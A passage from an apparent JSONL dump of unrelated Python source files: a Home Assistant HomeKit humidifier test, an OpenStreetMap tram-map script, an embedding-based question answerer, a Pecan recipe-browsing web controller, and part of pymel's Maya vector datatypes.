\"humidifier.test\"\n\n hass.states.async_set(entity_id, STATE_OFF)\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass,\n hk_driver,\n \"HumidifierDehumidifier\",\n entity_id,\n 1,\n {CONF_LINKED_HUMIDITY_SENSOR: humidity_sensor_entity_id},\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.char_current_humidity.value == 0\n\n\nasync def test_humidifier_as_dehumidifier(hass, hk_driver, events, caplog):\n \"\"\"Test an invalid char_target_humidifier_dehumidifier from HomeKit.\"\"\"\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(entity_id, STATE_OFF)\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass, hk_driver, \"HumidifierDehumidifier\", entity_id, 1, None\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.char_target_humidifier_dehumidifier.value == 1\n\n # Set from HomeKit\n char_target_humidifier_dehumidifier_iid = (\n acc.char_target_humidifier_dehumidifier.to_HAP()[HAP_REPR_IID]\n )\n\n hk_driver.set_characteristics(\n {\n HAP_REPR_CHARS: [\n {\n HAP_REPR_AID: acc.aid,\n HAP_REPR_IID: char_target_humidifier_dehumidifier_iid,\n HAP_REPR_VALUE: 0,\n },\n ]\n },\n \"mock_addr\",\n )\n\n await hass.async_block_till_done()\n assert \"TargetHumidifierDehumidifierState is not supported\" in caplog.text\n assert len(events) == 0\n"} {"ext": "py", "sha": "1a301e3a89ed6eb0361d8d6bfa049bf53d80761e", "content": "#!/usr/bin/python\n# -*- coding: utf8 -*-\n\nimport os\nimport logging\n\nimport sys\nimport argparse\nsys.path.append(\"../core\")\nfrom qgis_project_substitute import substitute_project\n\nfrom processor import Processor\n\n\ndef argparser_prepare():\n\n class PrettyFormatter(argparse.ArgumentDefaultsHelpFormatter,\n argparse.RawDescriptionHelpFormatter):\n\n max_help_position = 35\n\n parser = argparse.ArgumentParser(description='OSMTram process',\n formatter_class=PrettyFormatter)\n parser.add_argument('--prune',dest='prune', required=False, action='store_true', help='Clear temporary folder')\n parser.add_argument('--skip-osmupdate',dest='skip_osmupdate', required=False, action='store_true')\n parser.add_argument('--workdir',dest='WORKDIR', required=True)\n\n parser.epilog = \\\n '''Samples:\n%(prog)s\n\n''' \\\n % {'prog': parser.prog}\n return parser\n\ndump_url = 'http://download.geofabrik.de/europe/latvia-latest.osm.pbf'\n\nparser = argparser_prepare()\nargs = parser.parse_args()\n\nWORKDIR=args.WORKDIR\n\nlogging.basicConfig(level=logging.DEBUG,format='%(asctime)s %(levelname)-8s %(message)s',datefmt='%Y-%m-%d %H:%M:%S')\nlogger = logging.getLogger(__name__)\n\nlogger.info('Start')\n\nprocessor = Processor()\n\nprocessor.process_sheets('latvia.geojson',WORKDIR,dump_url,dump_name='latvia')\n\n#,attribute_filter='''\"name_ru\"= 'Лиепая' and \"type\"='tram' '''\n\n"} {"ext": "py", "sha": "1a301e9b700cc4f1eb12f4e8395c89aa84d99dfa", "content": "import numpy as np\n\nfrom src.util import Util, Article\n\n\nclass Answer:\n \"\"\"Answer questions based on the initialized article.\"\"\"\n\n def __init__(self, article):\n \"\"\"\n Create a new instance of the Answer class.\n\n Args:\n article: An instance of the Article class\n \"\"\"\n self.article = article\n\n def answer(self, question, return_score=False):\n \"\"\"\n Answer the given question.\n\n Args:\n question: Question string\n\n Returns:\n Answer to question as string\n \"\"\"\n u = Util()\n question_embedding = u.embeddings([question])[0]\n\n sentences_list = []\n\n for paragraph in self.article.sentences:\n paragraph_text = [s.text for s in paragraph]\n sentences_list += paragraph_text\n\n sentences_embeddings = u.embeddings(sentences_list)\n\n distances = []\n for i, embedding in enumerate(sentences_embeddings):\n diffs = np.inner(question_embedding, embedding)\n dist = diffs\n\n distances.append((dist, sentences_list[i]))\n\n distances.sort(key=lambda x: x[0], reverse=True)\n\n most_similar_sentence = distances[0][1]\n most_similar_score = distances[0][0]\n\n if return_score:\n return (most_similar_sentence, most_similar_score)\n\n return most_similar_sentence\n\n\nif __name__ == \"__main__\":\n u = Util()\n art = Article(u.load_txt_article(\"../articles/Development_data/set4/set4/a1.txt\"))\n a = Answer(art)\n q = \"Who studied the stars of the southern hemisphere from 1750 until 1754 from Cape of Good Hope?\"\n print(a.answer(q))\n\n# Who is a product of a revision of the Old Babylonian system in later Neo-Babylonian astronomy 6th century BC?\n# Who interpreted the creatures appearing in the books of Ezekiel (and thence in Revelation) as the middle signs of the four quarters of the Zodiac?\n# Who studied the stars of the southern hemisphere from 1750 until 1754 from Cape of Good Hope?\n# Who aided the IAU (International Astronomical Union) in dividing the celestial sphere into 88 official constellations?\n# Who is a product of a revision of the Old Babylonian system in later Neo-Babylonian astronomy 6th century BC?\n"} {"ext": "py", "sha": "1a301f062ea2131e6769a035818f1cba3b2d8e5b", "content": "from math import ceil\nfrom hashlib import md5\n\nfrom pecan import expose, request, abort, response, redirect\nfrom pecan.secure import secure\nfrom pecan.ext.wtforms import with_form\nfrom sqlalchemy import select, and_, or_, asc, desc, func, case, literal\n\nfrom draughtcraft import model\nfrom draughtcraft.lib.beerxml import export\nfrom draughtcraft.lib.forms.recipes.browse import RecipeSearchForm\nfrom create import RecipeCreationController\nfrom builder import RecipeBuilderController\n\n\nclass SlugController(object):\n\n def __init__(self, slug):\n self.slug = slug\n\n # Make sure the provided slug is valid\n if not slug:\n redirect(request.context['recipe'].slugs[0].slug)\n\n if slug not in [slug.slug for slug in request.context['recipe'].slugs]:\n abort(404)\n\n @expose('recipes/builder/index.html')\n @expose('json', content_type='application/json')\n def index(self):\n recipe = request.context['recipe']\n if recipe.state == \"DRAFT\":\n if recipe.author and recipe.author != request.context['user']:\n abort(404)\n if not recipe.author and recipe != request.context['trial_recipe']:\n abort(404)\n\n # Log a view for the recipe (if the viewer *is not* the author)\n if recipe.author != request.context['user'] and \\\n request.pecan.get('content_type') == 'application/json':\n model.RecipeView(recipe=recipe)\n\n return dict(\n recipe=recipe,\n editable=False\n )\n\n @expose(content_type='application/xml')\n def xml(self):\n recipe = request.context['recipe']\n if recipe.state == \"DRAFT\":\n if recipe.author and recipe.author != request.context['user']:\n abort(404)\n\n response.headers['Content-Disposition'] = \\\n 'attachment; filename=\"%s.xml\"' % self.slug\n return export.to_xml([request.context['recipe']])\n\n @expose(generic=True)\n def draft(self):\n abort(405)\n\n @draft.when(method=\"POST\")\n def do_draft(self):\n source = request.context['recipe']\n if source.author is None or source.author != request.context['user']:\n abort(401)\n if source.state != \"PUBLISHED\":\n abort(401)\n\n draft = source.draft()\n draft.flush()\n redirect(\"%sbuilder\" % draft.url())\n\n @expose(generic=True)\n def copy(self):\n abort(405)\n\n @copy.when(method=\"POST\")\n def do_copy(self):\n source = request.context['recipe']\n if request.context['user'] is None:\n redirect(\"/signup\")\n if source.author is None:\n abort(401)\n\n diff_user = source.author != request.context['user']\n\n name = source.name if diff_user else \"%s (Duplicate)\" % source.name\n copy = source.duplicate({\n 'name': name,\n 'author': request.context['user']\n })\n\n if diff_user:\n copy.copied_from = source\n\n redirect(\"/\")\n\n @expose(generic=True)\n def delete(self):\n abort(405)\n\n @delete.when(method=\"POST\")\n def do_delete(self):\n source = request.context['recipe']\n if source.author is None or source.author != request.context['user']:\n abort(401)\n\n source.delete()\n redirect(\"/\")\n\n builder = secure(\n RecipeBuilderController(),\n RecipeBuilderController.check_permissions\n )\n\n\nclass RecipeController(object):\n\n @expose()\n def _lookup(self, slug, *remainder):\n return SlugController(slug), remainder\n\n def __init__(self, recipeID):\n try:\n primary_key = int(str(recipeID), 16)\n except ValueError:\n abort(404)\n recipe = model.Recipe.get(primary_key)\n if recipe is None:\n abort(404)\n\n request.context['recipe'] = recipe\n\n\nclass RecipesController(object):\n\n @expose()\n def _lookup(self, recipeID, *remainder):\n return RecipeController(recipeID), remainder\n\n @expose('recipes/browse/index.html')\n def index(self):\n return dict(\n styles=model.Style.query.order_by(model.Style.name).all()\n )\n\n @expose(template='recipes/browse/list.html')\n @with_form(RecipeSearchForm, validate_safe=True)\n def recipes(self, **kw):\n if request.pecan['form'].errors:\n abort(400)\n\n perpage = 25.0\n offset = int(perpage * (kw['page'] - 1))\n\n views = func.count(model.RecipeView.id).label('views')\n username = func.lower(model.User.username).label('username')\n\n sortable_type = case([\n (model.Recipe.type == 'MASH', literal('All Grain')),\n (model.Recipe.type == 'EXTRACT', literal('Extract')),\n (\n model.Recipe.type == 'EXTRACTSTEEP',\n literal('Extract w/ Steeped Grains')\n ),\n (model.Recipe.type == 'MINIMASH', literal('Mini-Mash')),\n ]).label('type')\n\n # map of columns\n column_map = dict(\n type=(sortable_type,),\n srm=(model.Recipe._srm,),\n name=(model.Recipe.name,),\n author=(username,),\n style=(model.Style.name,),\n last_updated=(model.Recipe.last_updated,),\n views=(views,)\n )\n\n # determine the sorting direction and column\n order_column = column_map.get(kw['order_by'])\n order_direction = dict(\n ASC=asc,\n DESC=desc\n ).get(kw['direction'])\n\n where = [\n model.Recipe.state == 'PUBLISHED'\n ]\n\n # If applicable, filter by style\n if kw['style']:\n query = where.append(model.Recipe.style == kw['style'])\n\n # If applicable, filter by type (MASH, etc...)\n where.append(or_(\n model.Recipe.id is None,\n model.Recipe.type == 'MASH' if kw['mash'] else None,\n model.Recipe.type == 'MINIMASH' if kw['minimash'] else None,\n model.Recipe.type.in_(('EXTRACTSTEEP', 'EXTRACT'))\n if kw['extract'] else None,\n ))\n\n # If applicable, filter by color\n if kw['color']:\n start, end = {\n 'light': (0, 8),\n 'amber': (8, 18),\n 'brown': (16, 25),\n 'dark': (25, 5000)\n }.get(kw['color'])\n\n where.append(and_(\n model.Recipe._srm >= start,\n model.Recipe._srm <= end,\n ))\n\n # Join the `recipe`, `recipeview`, `user`, and `style` tables\n from_obj = model.Recipe.table.outerjoin(\n model.RecipeView.table,\n onclause=model.RecipeView.recipe_id == model.Recipe.id\n ).outerjoin(\n model.Style.table,\n onclause=model.Recipe.style_id == model.Style.id\n ).join(\n model.User.table,\n onclause=model.Recipe.author_id == model.User.id\n )\n\n username_full = model.User.username.label('username')\n email = model.User.email.label('email')\n style_name = model.Style.name.label('style_name')\n style_url = model.Style.url.label('style_url')\n query = select(\n [\n model.Recipe.id,\n model.Recipe.name,\n model.Recipe._srm,\n username_full,\n email,\n sortable_type,\n style_name,\n style_url,\n model.Recipe.last_updated,\n views\n ],\n and_(*where),\n from_obj=[from_obj],\n group_by=model.Recipe.id\n )\n total = select(\n [func.count(model.Recipe.id)],\n and_(*where)\n ).execute().fetchone()[0]\n\n if views not in order_column:\n query = query.group_by(*order_column)\n\n query = query.group_by(username_full)\n query = query.group_by(email)\n query = query.group_by(style_name)\n query = query.group_by(style_url)\n\n recipes = query.order_by(\n *[order_direction(column) for column in order_column]\n ).offset(\n offset\n ).limit(\n perpage\n ).execute().fetchall()\n\n class RecipeProxy(object):\n\n def __init__(self, recipe):\n self.id, self.name, self._srm, self.username, self.email, self.printable_type, self.style_name, self.style_url, self.last_updated, self.views = recipe\n\n @property\n def metric_unit(self):\n return 'EBC' if request.context['metric'] is True else 'SRM'\n\n @property\n def color(self):\n if self.metric_unit is 'SRM':\n return self._srm\n round(self._srm * 1.97, 1)\n\n @property\n def gravatar(self):\n return 'https://www.gravatar.com/avatar/%s?d=https://draughtcraft.com/images/glass-square.png' % (\n md5(self.email.strip().lower()).hexdigest()\n )\n\n @property\n def url(self):\n return '/recipes/%s/' % (('%x' % self.id).lower())\n\n return dict(\n pages=max(1, int(ceil(total / perpage))),\n current_page=kw['page'],\n offset=offset,\n perpage=perpage,\n total=total,\n order_by=kw['order_by'],\n direction=kw['direction'],\n recipes=map(RecipeProxy, recipes)\n )\n\n create = RecipeCreationController()\n"} {"ext": "py", "sha": "1a301f14b2a1db234d1df5d719a51461f77c8d12", "content": "\"\"\"Data classes that are returned by functions within ``pymel.core``\n\nA wrap of Maya's Vector, Point, Color, Matrix, TransformationMatrix, Quaternion, EulerRotation types\n\"\"\"\n\nimport sys\nimport math\nimport copy\nimport operator\nimport colorsys\n\nimport pymel.util as util\nimport pymel.api as _api\nfrom pymel.util.arrays import *\nfrom pymel.util.arrays import _toCompOrArrayInstance\nimport pymel.internal.factories as _factories\n\n\n# patch some Maya api classes that miss __iter__ to make them iterable / convertible to list\ndef _patchMVector():\n def __len__(self):\n \"\"\" Number of components in the Maya api Vector, ie 3 \"\"\"\n return 3\n type.__setattr__(_api.MVector, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api Vector \"\"\"\n for i in xrange(len(self)):\n yield _api.MVector.__getitem__(self, i)\n type.__setattr__(_api.MVector, '__iter__', __iter__)\n\ndef _patchMFloatVector():\n def __len__(self):\n \"\"\" Number of components in the Maya api FloatVector, ie 3 \"\"\"\n return 3\n type.__setattr__(_api.MFloatVector, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api FloatVector \"\"\"\n for i in xrange(len(self)):\n yield _api.MFloatVector.__getitem__(self, i)\n type.__setattr__(_api.MFloatVector, '__iter__', __iter__)\n\ndef _patchMPoint():\n def __len__(self):\n \"\"\" Number of components in the Maya api Point, ie 4 \"\"\"\n return 4\n type.__setattr__(_api.MPoint, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api Point \"\"\"\n for i in xrange(len(self)):\n yield _api.MPoint.__getitem__(self, i)\n type.__setattr__(_api.MPoint, '__iter__', __iter__)\n\ndef _patchMFloatPoint():\n def __len__(self):\n \"\"\" Number of components in the Maya api FloatPoint, ie 4 \"\"\"\n return 4\n type.__setattr__(_api.MFloatPoint, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api FloatPoint \"\"\"\n for i in xrange(len(self)):\n yield _api.MFloatPoint.__getitem__(self, i)\n type.__setattr__(_api.MFloatPoint, '__iter__', __iter__)\n\ndef _patchMColor():\n def __len__(self):\n \"\"\" Number of components in the Maya api Color, ie 4 \"\"\"\n return 4\n type.__setattr__(_api.MColor, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api Color \"\"\"\n for i in xrange(len(self)):\n yield _api.MColor.__getitem__(self, i)\n type.__setattr__(_api.MColor, '__iter__', __iter__)\n\ndef _patchMMatrix():\n def __len__(self):\n \"\"\" Number of rows in the Maya api Matrix, ie 4.\n Not to be confused with the number of components (16) given by the size method \"\"\"\n return 4\n type.__setattr__(_api.MMatrix, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all 4 rows of a Maya api Matrix \"\"\"\n for r in xrange(4):\n yield Array([_api.MScriptUtil.getDoubleArrayItem(_api.MMatrix.__getitem__(self, r), c) for c in xrange(4)])\n type.__setattr__(_api.MMatrix, '__iter__', __iter__)\n\ndef _patchMFloatMatrix():\n def __len__(self):\n \"\"\" Number of rows in the Maya api FloatMatrix, ie 4.\n Not to be confused with the number of components (16) given by the size method \"\"\"\n return 4\n type.__setattr__(_api.MFloatMatrix, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all 4 rows of a Maya api FloatMatrix \"\"\"\n for r in xrange(4):\n yield Array([_api.MScriptUtil.getFloatArrayItem(_api.MFloatMatrix.__getitem__(self, r), c) for c in xrange(4)])\n type.__setattr__(_api.MFloatMatrix, '__iter__', __iter__)\n\ndef _patchMTransformationMatrix():\n def __len__(self):\n \"\"\" Number of rows in the Maya api Matrix, ie 4.\n Not to be confused with the number of components (16) given by the size method \"\"\"\n return 4\n type.__setattr__(_api.MTransformationMatrix, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all 4 rows of a Maya api TransformationMatrix \"\"\"\n return self.asMatrix().__iter__()\n type.__setattr__(_api.MTransformationMatrix, '__iter__', __iter__)\n\ndef _patchMQuaternion():\n def __len__(self):\n \"\"\" Number of components in the Maya api Quaternion, ie 4 \"\"\"\n return 4\n type.__setattr__(_api.MQuaternion, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api Quaternion \"\"\"\n for i in xrange(len(self)):\n yield _api.MQuaternion.__getitem__(self, i)\n type.__setattr__(_api.MQuaternion, '__iter__', __iter__)\n\ndef _patchMEulerRotation():\n def __len__(self):\n \"\"\" Number of components in the Maya api EulerRotation, ie 3 \"\"\"\n return 3\n type.__setattr__(_api.MEulerRotation, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api EulerRotation \"\"\"\n for i in xrange(len(self)):\n yield _api.MEulerRotation.__getitem__(self, i)\n type.__setattr__(_api.MEulerRotation, '__iter__', __iter__)\n\n_patchMVector()\n_patchMFloatVector()\n_patchMPoint()\n_patchMFloatPoint()\n_patchMColor()\n_patchMMatrix()\n_patchMFloatMatrix()\n_patchMTransformationMatrix()\n_patchMQuaternion()\n_patchMEulerRotation()\n\n# the meta class of metaMayaWrapper\nclass MetaMayaArrayTypeWrapper(_factories.MetaMayaTypeWrapper):\n\n \"\"\" A metaclass to wrap Maya array type classes such as Vector, Matrix \"\"\"\n\n def __new__(mcl, classname, bases, classdict):\n \"\"\" Create a new wrapping class for a Maya api type, such as Vector or Matrix \"\"\"\n\n if 'shape' in classdict:\n # fixed shape means also fixed ndim and size\n shape = classdict['shape']\n ndim = len(shape)\n size = reduce(operator.mul, shape, 1)\n if 'ndim' not in classdict:\n classdict['ndim'] = ndim\n elif classdict['ndim'] != ndim:\n raise ValueError, \"class %s shape definition %s and number of dimensions definition %s do not match\" % (classname, shape, ndim)\n if 'size' not in classdict:\n classdict['size'] = size\n elif classdict['size'] != size:\n raise ValueError, \"class %s shape definition %s and size definition %s do not match\" % (classname, shape, size)\n\n # create the new class\n newcls = super(MetaMayaArrayTypeWrapper, mcl).__new__(mcl, classname, bases, classdict)\n\n try:\n apicls = newcls.apicls\n except:\n apicls = None\n try:\n shape = newcls.shape\n except:\n shape = None\n try:\n cnames = newcls.cnames\n except:\n cnames = ()\n\n if shape is not None:\n # fixed shape means also fixed ndim and size\n ndim = len(shape)\n size = reduce(operator.mul, shape, 1)\n\n if cnames:\n # definition for component names\n type.__setattr__(newcls, 'cnames', cnames)\n subsizes = [reduce(operator.mul, shape[i + 1:], 1) for i in xrange(ndim)]\n for index, compname in enumerate(cnames):\n coords = []\n for i in xrange(ndim):\n c = index // subsizes[i]\n index -= c * subsizes[i]\n coords.append(c)\n if len(coords) == 1:\n coords = coords[0]\n else:\n coords = tuple(coords)\n\n\n# def _get(self):\n# return self.__getitem__(coords)\n# _get.__name__ = '_get_' + compname\n#\n# # FIXME : the set property does not do anything in python 2.4 !!! It doesn't even get called.\n#\n# def _set(self, val):\n# self.__setitem__(coords, val)\n#\n# _set.__name__ = '_set_' + compname\n#\n# p = property( _get, _set, None, 'set and get %s component' % compname )\n\n cmd = \"property( lambda self: self.__getitem__(%s) , lambda self, val: self.__setitem__(%s,val) )\" % (coords, coords)\n p = eval(cmd)\n\n if compname not in classdict:\n type.__setattr__(newcls, compname, p)\n else:\n raise AttributeError, \"component name %s clashes with class method %r\" % (compname, classdict[compname])\n elif cnames:\n raise ValueError, \"can only define component names for classes with a fixed shape/size\"\n\n # constants for shape, ndim, size\n if shape is not None:\n type.__setattr__(newcls, 'shape', shape)\n if ndim is not None:\n type.__setattr__(newcls, 'ndim', ndim)\n if size is not None:\n type.__setattr__(newcls, 'size', size)\n #__slots__ = ['_data', '_shape', '_size']\n # add component names to read-only list\n readonly = newcls.__readonly__\n if hasattr(newcls, 'shape'):\n readonly['shape'] = None\n if hasattr(newcls, 'ndim'):\n readonly['ndim'] = None\n if hasattr(newcls, 'size'):\n readonly['size'] = None\n if 'cnames' not in readonly:\n readonly['cnames'] = None\n type.__setattr__(newcls, '__readonly__', readonly)\n\n# print \"created class\", newcls\n# print \"bases\", newcls.__bases__\n# print \"readonly\", newcls.__readonly__\n# print \"slots\", newcls.__slots__\n return newcls\n\n# generic math function that can operate on Arrays herited from arrays\n# (min, max, sum, prod...)\n\n# Functions that work on vectors will now be inherited from Array and properly defer\n# to the class methods\n\n\nclass Vector(VectorN):\n\n \"\"\"\n A 3 dimensional vector class that wraps Maya's api Vector class\n\n >>> from pymel.all import *\n >>> import pymel.core.datatypes as dt\n >>>\n >>> v = dt.Vector(1, 2, 3)\n >>> w = dt.Vector(x=1, z=2)\n >>> z = dt.Vector( dt.Vector.xAxis, z=1)\n\n >>> v = dt.Vector(1, 2, 3, unit='meters')\n >>> print v\n [1.0, 2.0, 3.0]\n \"\"\"\n __metaclass__ = MetaMayaArrayTypeWrapper\n __slots__ = ()\n # class specific info\n apicls = _api.MVector\n cnames = ('x', 'y', 'z')\n shape = (3,)\n unit = None\n\n def __new__(cls, *args, **kwargs):\n shape = kwargs.get('shape', None)\n ndim = kwargs.get('ndim', None)\n size = kwargs.get('size', None)\n # will default to class constant shape = (3,), so it's just an error check to catch invalid shapes,\n # as no other option is actually possible on Vector, but this method could be used to allow wrapping\n # of Maya array classes that can have a variable number of elements\n shape, ndim, size = cls._expandshape(shape, ndim, size)\n\n new = cls.apicls.__new__(cls)\n cls.apicls.__init__(new)\n return new\n\n def __init__(self, *args, **kwargs):\n \"\"\" __init__ method, valid for Vector, Point and Color classes \"\"\"\n cls = self.__class__\n\n if args:\n # allow both forms for arguments\n if len(args) == 1 and hasattr(args[0], '__iter__'):\n args = args[0]\n # shortcut when a direct api init is possible\n try:\n self.assign(args)\n except:\n # special exception to the rule that you cannot drop data in Arrays __init__\n # to allow all conversion from Vector derived classes (MPoint, MColor) to a base class\n # special case for MPoint to cartesianize if necessary\n # note : we may want to premultiply MColor by the alpha in a similar way\n if isinstance(args, _api.MPoint) and args.w != 1.0:\n args = copy.deepcopy(args).cartesianize()\n if isinstance(args, _api.MColor) and args.a != 1.0:\n # note : we may want to premultiply Color by the alpha in a similar way\n pass\n if isinstance(args, _api.MVector) or isinstance(args, _api.MPoint) or isinstance(args, _api.MColor):\n args = tuple(args)\n if len(args) > len(self):\n args = args[slice(self.shape[0])]\n super(Vector, self).__init__(*args)\n\n if hasattr(cls, 'cnames') and len(set(cls.cnames) & set(kwargs)):\n # can also use the form =\n l = list(self.flat)\n setcomp = False\n for i, c in enumerate(cls.cnames):\n if c in kwargs:\n if float(l[i]) != float(kwargs[c]):\n l[i] = float(kwargs[c])\n setcomp = True\n if setcomp:\n try:\n self.assign(l)\n except:\n msg = \", \".join(map(lambda x, y: x + \"=<\" + util.clsname(y) + \">\", cls.cnames, l))\n raise TypeError, \"in %s(%s), at least one of the components is of an invalid type, check help(%s) \" % (cls.__name__, msg, cls.__name__)\n\n # units handling\n self.unit = kwargs.get('unit', None)\n if self.unit is not None:\n self.assign([Distance(x, self.unit) for x in self])\n\n def __repr__(self):\n if hasattr(self, 'unit') and self.unit:\n return \"dt.%s(%s, unit='%s')\" % (self.__class__.__name__, str(self), self.unit)\n else:\n return \"dt.%s(%s)\" % (self.__class__.__name__, str(self))\n\n # for compatibility with base classes Array that actually hold a nested list in their _data attribute\n # here, there is no _data attribute as we subclass _api.MVector directly, thus v.data is v\n # for wraps\n\n def _getdata(self):\n return self.apicls(self)\n\n def _setdata(self, value):\n self.assign(value)\n\n def _deldata(self):\n if hasattr(self.apicls, 'clear'):\n self.apicls.clear(self)\n else:\n raise TypeError, \"cannot clear stored elements of %s\" % (self.__class__.__name__)\n\n data = property(_getdata, _setdata, _deldata, \"The Vector/FloatVector/Point/FloatPoint/Color data\")\n\n # overloads for assign and get though standard way should be to use the data property\n # to access stored values\n\n def assign(self, value):\n \"\"\" Wrap the Vector api assign method \"\"\"\n # don't accept instances as assign works on exact types\n if type(value) != self.apicls and type(value) != type(self):\n if not hasattr(value, '__iter__'):\n value = (value,)\n value = self.apicls(*value)\n self.apicls.assign(self, value)\n return self\n\n # API get, actually not faster than pulling self[i] for such a short structure\n def get(self):\n \"\"\" Wrap the Vector api get method \"\"\"\n # need to keep a ref to the MScriptUtil alive until\n # all pointers aren't needed...\n ms = _api.MScriptUtil()\n l = (0,) * self.size\n ms.createFromDouble(*l)\n p = ms.asDoublePtr()\n self.apicls.get(self, p)\n return tuple([ms.getDoubleArrayItem(p, i) for i in xrange(self.size)])\n\n def __len__(self):\n \"\"\" Number of components in the Vector instance, 3 for Vector, 4 for Point and Color \"\"\"\n return self.apicls.__len__(self)\n\n # __getitem__ / __setitem__ override\n\n # faster to override __getitem__ cause we know Vector only has one dimension\n def __getitem__(self, i):\n \"\"\" Get component i value from self \"\"\"\n if hasattr(i, '__iter__'):\n i = list(i)\n if len(i) == 1:\n i = i[0]\n else:\n raise IndexError, \"class %s instance %s has only %s dimension(s), index %s is out of bounds\" % (util.clsname(self), self, self.ndim, i)\n if isinstance(i, slice):\n return _toCompOrArrayInstance(list(self)[i], VectorN)\n try:\n return _toCompOrArrayInstance(list(self)[i], VectorN)\n except:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, i)\n else:\n if i < 0:\n i = self.size + i\n if i < self.size and not i < 0:\n if hasattr(self.apicls, '__getitem__'):\n return self.apicls.__getitem__(self, i)\n else:\n return list(self)[i]\n else:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, i)\n\n # as _api.Vector has no __setitem__ method, so need to reassign the whole Vector\n def __setitem__(self, i, a):\n \"\"\" Set component i value on self \"\"\"\n v = VectorN(self)\n v.__setitem__(i, a)\n self.assign(v)\n\n # iterator override\n\n # TODO : support for optional __iter__ arguments\n def __iter__(self, *args, **kwargs):\n \"\"\" Iterate on the api components \"\"\"\n return self.apicls.__iter__(self.data)\n\n def __contains__(self, value):\n \"\"\" True if at least one of the vector components is equal to the argument \"\"\"\n return value in self.__iter__()\n\n # common operators without an api equivalent are herited from VectorN\n\n # operators using the Maya API when applicable, but that can delegate to VectorN\n\n def __eq__(self, other):\n \"\"\" u.__eq__(v) <==> u == v\n Equivalence test \"\"\"\n try:\n return bool(self.apicls.__eq__(self, other))\n except Exception:\n return bool(super(Vector, self).__eq__(other))\n\n def __ne__(self, other):\n \"\"\" u.__ne__(v) <==> u != v\n Equivalence test \"\"\"\n return (not self.__eq__(other))\n\n def __neg__(self):\n \"\"\" u.__neg__() <==> -u\n The unary minus operator. Negates the value of each of the components of u \"\"\"\n return self.__class__(self.apicls.__neg__(self))\n\n def __add__(self, other):\n \"\"\" u.__add__(v) <==> u+v\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__add__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__add__(other))\n\n def __radd__(self, other):\n \"\"\" u.__radd__(v) <==> v+u\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__radd__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__radd__(other))\n\n def __iadd__(self, other):\n \"\"\" u.__iadd__(v) <==> u += v\n In place addition of u and v, see __add__ \"\"\"\n try:\n return self.__class__(self.__add__(other))\n except Exception:\n return NotImplemented\n\n def __sub__(self, other):\n \"\"\" u.__sub__(v) <==> u-v\n Returns the result of the substraction of v from u if v is convertible to a VectorN (element-wise substration),\n substract v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__sub__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__sub__(other))\n\n def __rsub__(self, other):\n \"\"\" u.__rsub__(v) <==> v-u\n Returns the result of the substraction of u from v if v is convertible to a VectorN (element-wise substration),\n replace every component c of u by v-c if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rsub__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__rsub__(other))\n\n def __isub__(self, other):\n \"\"\" u.__isub__(v) <==> u -= v\n In place substraction of u and v, see __sub__ \"\"\"\n try:\n return self.__class__(self.__sub__(other))\n except Exception:\n return NotImplemented\n\n def __div__(self, other):\n \"\"\" u.__div__(v) <==> u/v\n Returns the result of the division of u by v if v is convertible to a VectorN (element-wise division),\n divide every component of u by v if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__div__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__div__(other))\n\n def __rdiv__(self, other):\n \"\"\" u.__rdiv__(v) <==> v/u\n Returns the result of of the division of v by u if v is convertible to a VectorN (element-wise division),\n invert every component of u and multiply it by v if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rdiv__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__rdiv__(other))\n\n def __idiv__(self, other):\n \"\"\" u.__idiv__(v) <==> u /= v\n In place division of u by v, see __div__ \"\"\"\n try:\n return self.__class__(self.__div__(other))\n except Exception:\n return NotImplemented\n # action depends on second object type\n\n def __mul__(self, other):\n \"\"\" u.__mul__(v) <==> u*v\n The multiply '*' operator is mapped to the dot product when both objects are Vectors,\n to the transformation of u by matrix v when v is a MatrixN,\n to element wise multiplication when v is a sequence,\n and multiplies each component of u by v when v is a numeric type. \"\"\"\n try:\n res = self.apicls.__mul__(self, other)\n assert res is not NotImplemented\n except Exception:\n res = super(Vector, self).__mul__(other)\n if util.isNumeric(res) or res is NotImplemented:\n return res\n else:\n return self.__class__._convert(res)\n\n def __rmul__(self, other):\n \"\"\" u.__rmul__(v) <==> v*u\n The multiply '*' operator is mapped to the dot product when both objects are Vectors,\n to the left side multiplication (pre-multiplication) of u by matrix v when v is a MatrixN,\n to element wise multiplication when v is a sequence,\n and multiplies each component of u by v when v is a numeric type. \"\"\"\n try:\n res = self.apicls.__rmul__(self, other)\n except:\n res = super(Vector, 